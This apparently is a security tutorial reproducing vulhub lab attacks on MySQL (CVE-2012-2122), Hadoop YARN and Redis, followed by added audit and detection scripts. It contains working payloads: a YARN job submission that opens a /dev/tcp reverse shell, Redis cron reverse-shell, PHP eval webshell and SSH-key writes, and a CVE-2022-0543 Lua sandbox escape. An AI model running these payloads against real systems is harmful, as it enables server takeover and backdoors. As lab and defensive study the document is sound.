Database Security: Redis, Hadoop and MySQL Unauthorized Access and RCE Vulnerability Reproduction

Contents

  • Database Security: Redis, Hadoop, MySQL unauthorized access and RCE
    • Definition
    • Vulnerability reproduction
      • MySQL CVE-2012-2122 vulnerability
      • Hadoop improper configuration: unauthorized access and RCE vulnerability
    • Redis unauthorized access: webshell, scheduled task, SSH key, RCE, etc.
      • Vulnerability definition
      • Vulnerability causes
      • Vulnerability hazards
      • Vulnerability reproduction
        • Redis unauthorized access: webshell, scheduled task, SSH key, RCE
        • Redis command execution (RCE)
        • Redis sandbox bypass (CVE-2022-0543)
    • Hardening ideas

Database Security: Redis, Hadoop, MySQL unauthorized access and RCE

Definition

Unauthorized access vulnerabilities are flaws in addresses or pages that should require a security configuration or permission check but can instead be reached directly by any user. This lets privileged operations be performed and sensitive information, such as databases or website directories, be leaked. Common cases are service ports that accept connections without authentication and unauthenticated management pages such as /admin.php or /menu.php.

Common unauthorized access vulnerabilities and their default ports:

[21, 139, 873, 2049, 2181, 2182, 2375, 5601, 5672, 5900, 5901, 5984, 6379, 6443, 8080, 8088,
8095, 8161, 9100, 9200, 9300, 11211, 15672, 15692, 20048, 25672, 27017], etc.

Vulnerability reproduction

MySQL CVE-2012-2122 vulnerability

Lab environment: vulhub

[screenshot]

Start the environment and run the payload.

The loop below sends login attempts continuously (replace your-ip with the target address):

for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306; done

On affected builds the password check truncates the result of memcmp() to a single byte, so a wrong password is accepted with a probability of about 1 in 256. After the loop has run for a short while one attempt succeeds and you are dropped straight into the MySQL shell:

[screenshot]

Successful entry:

[screenshot]

Hadoop improper configuration: unauthorized access and RCE vulnerability

Lab environment: vulhub

[screenshot]

Start the environment:

[screenshot]

payload:

#!/usr/bin/env python

import requests

target = 'http://192.168.100.134:8088/'
lhost = '192.168.100.1'  # put your local host ip here, and listen at port 9999

# Step 1: ask the ResourceManager REST API for a new application id (no authentication is required)
url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']

# Step 2: submit the application; the ApplicationMaster container runs the given command
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

Start a listener on the attacking machine:

nc -lvvp 9999

[screenshot]

Run the Python script:

The reverse shell connects back successfully:

[screenshot]

Commands can now be executed:

[screenshot]
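As an added defender-side example (my own code, not part of this post or of vulhub), the following Python script reads Hadoop XML configuration files and reports the settings that leave the YARN ResourceManager REST API open to the kind of application submission shown above. The property names are real Hadoop settings; the check list, the two sample configurations and the hostname in them are constructed for this example, and the defaults assumed for absent properties are Hadoop's own (simple authentication, ACLs disabled).

```python
import sys
import xml.etree.ElementTree as ET

# Constructed sample resembling the core-site.xml/yarn-site.xml of a lab cluster
# with no authentication configured (the situation this section exploits).
WEAK_CONFIG = """<?xml version="1.0"?>
<configuration>
  <property><name>hadoop.security.authentication</name><value>simple</value></property>
  <property><name>yarn.resourcemanager.webapp.address</name><value>0.0.0.0:8088</value></property>
  <property><name>yarn.acl.enable</name><value>false</value></property>
</configuration>
"""

# Constructed sample of the same properties after hardening (hostname is a placeholder).
HARDENED_CONFIG = """<?xml version="1.0"?>
<configuration>
  <property><name>hadoop.security.authentication</name><value>kerberos</value></property>
  <property><name>hadoop.http.authentication.type</name><value>kerberos</value></property>
  <property><name>yarn.resourcemanager.webapp.address</name><value>rm.internal.example:8088</value></property>
  <property><name>yarn.acl.enable</name><value>true</value></property>
</configuration>
"""


def parse_hadoop_config(xml_text):
    """Return {property name: value} for a Hadoop-style <configuration> XML document."""
    props = {}
    for prop in ET.fromstring(xml_text).iter("property"):
        name = prop.findtext("name")
        if name:
            props[name.strip()] = (prop.findtext("value") or "").strip()
    return props


def audit_yarn_exposure(props):
    """Return a list of findings explaining how an unauthenticated client could reach YARN.

    Defaults used when a property is absent are Hadoop's own defaults
    (simple authentication, ACLs disabled)."""
    findings = []
    if props.get("hadoop.security.authentication", "simple") != "kerberos":
        findings.append("hadoop.security.authentication is not kerberos: clients are trusted "
                        "to declare their own user name")
    if props.get("hadoop.http.authentication.type", "simple") != "kerberos":
        findings.append("hadoop.http.authentication.type is not kerberos: the ResourceManager "
                        "REST API (ws/v1/cluster/apps) accepts application submissions "
                        "from anyone who can reach port 8088")
    addr = props.get("yarn.resourcemanager.webapp.address", "")
    if addr.startswith(("0.0.0.0:", ":")):
        findings.append(f"yarn.resourcemanager.webapp.address={addr}: web UI/REST API bound "
                        "to all interfaces, so the port is reachable beyond the cluster network")
    if props.get("yarn.acl.enable", "false").lower() != "true":
        findings.append("yarn.acl.enable is false: no admin or queue ACLs limit who may "
                        "submit applications")
    return findings


def audit_files(paths):
    """Merge the given config files (later files override earlier ones) and audit them."""
    props = {}
    for path in paths:
        with open(path, encoding="utf-8") as fh:
            props.update(parse_hadoop_config(fh.read()))
    return audit_yarn_exposure(props)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # e.g. python audit_yarn.py /etc/hadoop/core-site.xml /etc/hadoop/yarn-site.xml
        findings = audit_files(sys.argv[1:])
    else:
        findings = audit_yarn_exposure(parse_hadoop_config(WEAK_CONFIG))
    for f in findings:
        print("FINDING:", f)
    if not findings:
        print("No exposure findings")
```

Run it against the cluster's real core-site.xml and yarn-site.xml (later files override earlier ones, as Hadoop itself does); with no arguments it audits the constructed weak sample and reports all four findings, while the hardened sample reports none.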

Redis unauthorized access: webshell, scheduled task, SSH key, RCE, etc.

Redis is a very fast, open-source, network-accessible, in-memory, persistent, log-structured, non-relational database.

It provides client APIs in many languages: Java, C, C++, C#, PHP, JavaScript, etc.

Vulnerability definition:

The Redis unauthorized access vulnerability arises when a Redis server runs an older version and has no login password set. An attacker who knows only the IP address and port of the Redis server can log in to it remotely and then use that access to take control of the target server.

Cause of vulnerability

1. Redis version 4.x/5.0.5 or earlier.

2. Redis is bound to 0.0.0.0:6379, and no firewall rules or other security policies restrict untrusted source IPs, so the service is exposed directly to the public network.

3. No password authentication is configured (the password is empty by default), so anyone can log in to the Redis service remotely without a password.

Vulnerability hazards

An attacker can use Redis commands to write a scheduled task on the target server that spawns a reverse shell, taking control of the server. An attacker can also write a webshell into the website directory to gain initial control of the web server. Most seriously, if Redis runs as root, the attacker can write an SSH public key into the root account's authorized_keys file and log in to the victim server directly over SSH.

Vulnerability reproduction

Redis unauthorized access: webshell, scheduled task, SSH key, RCE

Vulnerability verification:

Verification ideas:

The essence of the unauthorized access vulnerability is that the server login can be completed without a user password, so the verification idea is very simple. As long as the attack machine can be used to log in to the target server without a password, the vulnerability exists.

On the server side, start the Redis service.

Attacking machine: run redis-cli -h IP to connect to the Redis server.

After connecting, run info; if server information is returned, the verification succeeded.

Exploit:

How to exploit the vulnerability
1. Write a scheduled task that spawns a reverse shell
Exploitation process
Target: runs the Redis server
Attacker: connects to the Redis server

Use the attacking machine to write the scheduled task into the server:
config set dir /var/spool/cron    //directory to write to: the cron spool folder
config set dbfilename root        //file name to write; any name can be used
set ssr "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/attackIP/1234 0>&1\n\n"    //content to write
save                              //write the dump file to disk

Attacking machine:
Run nc -lvvp 1234 and wait a moment; the attacking machine receives the target's shell.
Use crontab -l on the target to view the scheduled task that was written.


2. Write webshell
config set dir /var/www/html
config set dbfilename shell.php
set webshell "<?php @eval($_POST['cmd']); ?>" //webshell backdoor
save


3. Write an SSH public key to log in
1) Start the SSH service on both the attacking machine and the target machine
Command: systemctl start ssh (if it is not installed, install it with apt or yum)

2) Create the SSH public key directory on the target machine
Command: mkdir /root/.ssh    //use ls -al to check that it was created

3) Clear the /root/.ssh directory on the attacking machine so that the key files generated in the next step are easy to identify.
Command: rm -rf *

4) Generate the SSH key pair on the attacking machine (press Enter three times)
Command: ssh-keygen -t rsa

5) Switch to the key directory on the attacking machine:
Command: cd /root/.ssh

6) Write the public key to 1.txt (add \n\n before and after it so it is separated from other data cached in Redis; otherwise the write keeps failing)
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > 1.txt

Store the contents of 1.txt as a key on the target Redis server; the target file can then be written from it.
Command:
cat 1.txt | redis-cli -h targetIP -x set crack    //store the contents of 1.txt under the key "crack" (any name can be used)

Connect to the target with redis-cli -h targetIP and run the following commands to write the local SSH public key onto the target machine:
config set dir /root/.ssh
config get dir
config set dbfilename authorized_keys
save
Log in from the attacking machine over SSH without a password:
cd /root/.ssh
ssh -i id_rsa root@targetIP

Redis command execution (RCE)

Lab environment: vulhub

[screenshot]

Start the environment and verify: connect and run info; if it executes, the instance accepts unauthenticated access:

[screenshot]

Using an automation tool:

Run the tool directly.

Tool address

payload:
python3 redis-master.py -r target-ip -p 6379 -L local-ip -P 8888 -f RedisModulesSDK/exp.so -c "id"

python3 redis-master.py -r target-ip -p 6379 -L local-ip -P 8888 -f RedisModulesSDK/exp.so -c "whoami"

//The command can also be replaced with a reverse-shell command to get a shell back.

Result:

[screenshot]

[screenshot]

Try another command:

whoami

[screenshot]

The command executed successfully.

Redis sandbox bypass (CVE-2022-0543)

Lab environment: vulhub

[screenshot]

Start the environment.

payload:
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("whoami", "r"); local res = f:read("*a"); f:close(); return res' 0

//The command can also be replaced with a reverse-shell command to get a shell back.

Result:

[screenshot]
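All of the Redis techniques above (the cron file, the webshell, the authorized_keys write, the rogue module loaded by the automation tool, and the CVE-2022-0543 Lua payload) pass through the command stream that redis-cli monitor exposes. As an added detection example that is not part of this post, the Python script below parses MONITOR output and raises an alert on those patterns: a CONFIG SET dir into a cron, .ssh or web directory followed by SAVE from the same client, a dbfilename that looks like a key file or web script, MODULE LOAD, SLAVEOF/REPLICAOF to an external host, and EVAL calling package.loadlib. The MONITOR line format is Redis's own; the sample lines, client addresses and file paths are constructed.

```python
import re
import shlex

# Constructed sample of `redis-cli monitor` output: one client performing the cron-file
# write from this post, one running a CVE-2022-0543-style EVAL, one loading a module,
# one pointing replication at an external host (the rogue-master tool's pattern), and
# one ordinary application client (10.0.0.9) that should produce no alert.
SAMPLE_MONITOR = r'''OK
1697180000.100000 [0 10.0.0.5:50210] "CONFIG" "SET" "dir" "/var/spool/cron"
1697180000.200000 [0 10.0.0.5:50210] "CONFIG" "SET" "dbfilename" "root"
1697180000.300000 [0 10.0.0.5:50210] "SET" "ssr" "placeholder-cron-line"
1697180000.400000 [0 10.0.0.5:50210] "SAVE"
1697180001.000000 [0 10.0.0.9:40100] "GET" "session:42"
1697180002.000000 [0 10.0.0.5:50211] "EVAL" "return package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\")" "0"
1697180003.000000 [0 10.0.0.5:50212] "MODULE" "LOAD" "/tmp/exp.so"
1697180004.000000 [0 10.0.0.5:50213] "SLAVEOF" "10.0.0.5" "8888"
1697180005.000000 [0 10.0.0.9:40100] "SET" "cache:1" "v"
'''

# Directories an RDB dump should never be written into; substring match on purpose so
# /home/<user>/.ssh and /var/www/<site> are covered too.
SENSITIVE_DIR_MARKERS = ("/spool/cron", "/cron.d", "/crontabs", "/.ssh", "/www", "/nginx/html")
SENSITIVE_FILENAMES = ("authorized_keys",)
WEBSHELL_SUFFIXES = (".php", ".jsp", ".jspx", ".aspx")

# MONITOR line: "<unix time> [<db> <client addr>] "CMD" "arg" ..."
LINE_RE = re.compile(r"^(\d+\.\d+) \[(\d+) (\S+)\] (.+)$")


def parse_monitor_line(line):
    """Parse one MONITOR line into a dict, or return None for 'OK' and other noise."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, db, client, rest = m.groups()
    try:
        argv = shlex.split(rest)  # MONITOR double-quotes every argument; shlex undoes that
    except ValueError:
        return None
    if not argv:
        return None
    return {"ts": float(ts), "db": int(db), "client": client,
            "cmd": argv[0].upper(), "args": argv[1:]}


def is_sensitive_dir(path):
    return any(marker in path for marker in SENSITIVE_DIR_MARKERS)


def detect(lines):
    """Return (client, message) alerts for the exploitation patterns in this post."""
    alerts = []
    last_dir = {}  # client -> most recent CONFIG SET dir value, to tie a later SAVE to it
    for line in lines:
        ev = parse_monitor_line(line)
        if ev is None:
            continue
        cmd, args, client = ev["cmd"], ev["args"], ev["client"]
        sub = args[0].upper() if args else ""
        if cmd == "CONFIG" and sub == "SET" and len(args) >= 3:
            key, value = args[1].lower(), args[2]
            if key == "dir":
                last_dir[client] = value
                if is_sensitive_dir(value):
                    alerts.append((client, f"CONFIG SET dir {value}: dump directory moved to a sensitive path"))
            elif key == "dbfilename" and (value in SENSITIVE_FILENAMES or value.endswith(WEBSHELL_SUFFIXES)):
                alerts.append((client, f"CONFIG SET dbfilename {value}: dump file named like a key or web script"))
        elif cmd in ("SAVE", "BGSAVE") and is_sensitive_dir(last_dir.get(client, "")):
            alerts.append((client, f"{cmd} after dir was set to {last_dir[client]}: attacker-controlled file written"))
        elif cmd in ("SLAVEOF", "REPLICAOF") and sub and sub != "NO":
            alerts.append((client, f"{cmd} {' '.join(args)}: replication pointed at an external master"))
        elif cmd == "MODULE" and sub == "LOAD":
            alerts.append((client, f"MODULE LOAD {' '.join(args[1:])}: native code loaded into redis-server"))
        elif cmd in ("EVAL", "EVALSHA") and args and "loadlib" in args[0]:
            alerts.append((client, "EVAL using package.loadlib: Lua sandbox escape (CVE-2022-0543 pattern)"))
    return alerts


if __name__ == "__main__":
    # Live use: redis-cli -h <host> monitor | python redis_monitor_detect.py
    import sys
    source = sys.stdin if not sys.stdin.isatty() else SAMPLE_MONITOR.splitlines()
    for client, msg in detect(source):
        print(f"ALERT {client}: {msg}")
```

The dbfilename check deliberately does not flag the name root used in the cron step, since a bare name is not suspicious on its own; that case is caught by correlating CONFIG SET dir with the following SAVE from the same client. MONITOR costs throughput on a busy instance, so in production the same rules are better applied to a command log produced by a proxy or to the ACL LOG on Redis 6+.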

Hardening ideas

1. Upgrade Redis to a patched version.
2. Change the default port 6379.
3. Set up password authentication.
4. Set up a firewall to restrict access to the port.
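As an added example (my own, not the post's), the script below turns hardening ideas 2 and 3 into a check over redis.conf, together with two directly related settings, protected-mode and rename-command, which are real Redis directives. The version helper applies the "4.x/5.0.5 or earlier" range that this post lists as affected, not an independent cutoff; idea 4 (firewalling) cannot be read from redis.conf and shows up only as the bind advice. Both configuration samples, the minimum password length and the passphrase placeholder are constructed.

```python
import shlex

# Constructed sample: a redis.conf with the exposed defaults this post exploits.
WEAK_CONF = """
bind 0.0.0.0
port 6379
protected-mode no
dir /var/lib/redis
dbfilename dump.rdb
"""

# Constructed sample applying hardening ideas 2 and 3 plus related settings;
# the passphrase and addresses are placeholders.
HARDENED_CONF = """
bind 127.0.0.1 10.0.0.12
port 16379
protected-mode yes
requirepass "replace-with-a-long-random-passphrase-from-your-vault"
rename-command CONFIG ""
rename-command MODULE ""
rename-command SLAVEOF ""
rename-command REPLICAOF ""
dir /var/lib/redis
dbfilename dump.rdb
"""

# Commands the exploitation chains in this post depend on.
DANGEROUS_COMMANDS = ("CONFIG", "MODULE", "SLAVEOF", "REPLICAOF")
MIN_PASSWORD_LEN = 16  # assumption for this audit, not a Redis requirement


def parse_redis_conf(text):
    """Parse redis.conf into {directive: [args]}; rename-command entries are collected in a dict."""
    conf = {"rename-command": {}}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)  # handles the quoted "" used to disable a command
        directive, args = parts[0].lower(), parts[1:]
        if directive == "rename-command" and len(args) == 2:
            conf["rename-command"][args[0].upper()] = args[1]
        else:
            conf[directive] = args
    return conf


def audit_redis_conf(conf):
    """Return findings for the hardening points in this post that a redis.conf can show."""
    findings = []
    binds = conf.get("bind", [])
    if not binds or any(b in ("0.0.0.0", "*", "::", "-::*") for b in binds):
        findings.append("bind: listening on all interfaces (no bind line or bind 0.0.0.0); "
                        "bind to loopback or an internal address and firewall the port")
    if conf.get("port", ["6379"])[0] == "6379":
        findings.append("port: still the default 6379, the port that unauthorized-access scans look for")
    password = conf.get("requirepass", [""])[0]
    if not password:
        findings.append("requirepass: not set, any client that reaches the port is logged in")
    elif len(password) < MIN_PASSWORD_LEN:
        findings.append(f"requirepass: shorter than {MIN_PASSWORD_LEN} characters")
    if conf.get("protected-mode", ["yes"])[0].lower() != "yes":
        findings.append("protected-mode no: Redis will not refuse external clients even without a password")
    still_enabled = [c for c in DANGEROUS_COMMANDS if conf["rename-command"].get(c) != ""]
    if still_enabled:
        findings.append("rename-command: " + ", ".join(still_enabled) +
                        " still callable; disable them (or restrict them with ACLs on Redis 6+)")
    return findings


def version_in_post_range(version):
    """True if the version is within the '4.x / 5.0.5 or earlier' range this post lists as affected."""
    parts = tuple(int(p) for p in version.split(".")[:3])
    return parts <= (5, 0, 5)


if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"== {label} ==")
        for finding in audit_redis_conf(parse_redis_conf(text)) or ["no findings"]:
            print(" -", finding)
```

Point parse_redis_conf at the running instance's real configuration file (or at the output of CONFIG GET, reformatted one directive per line) and compare the result with INFO server's redis_version through version_in_post_range; the weak sample yields five findings and the hardened one none.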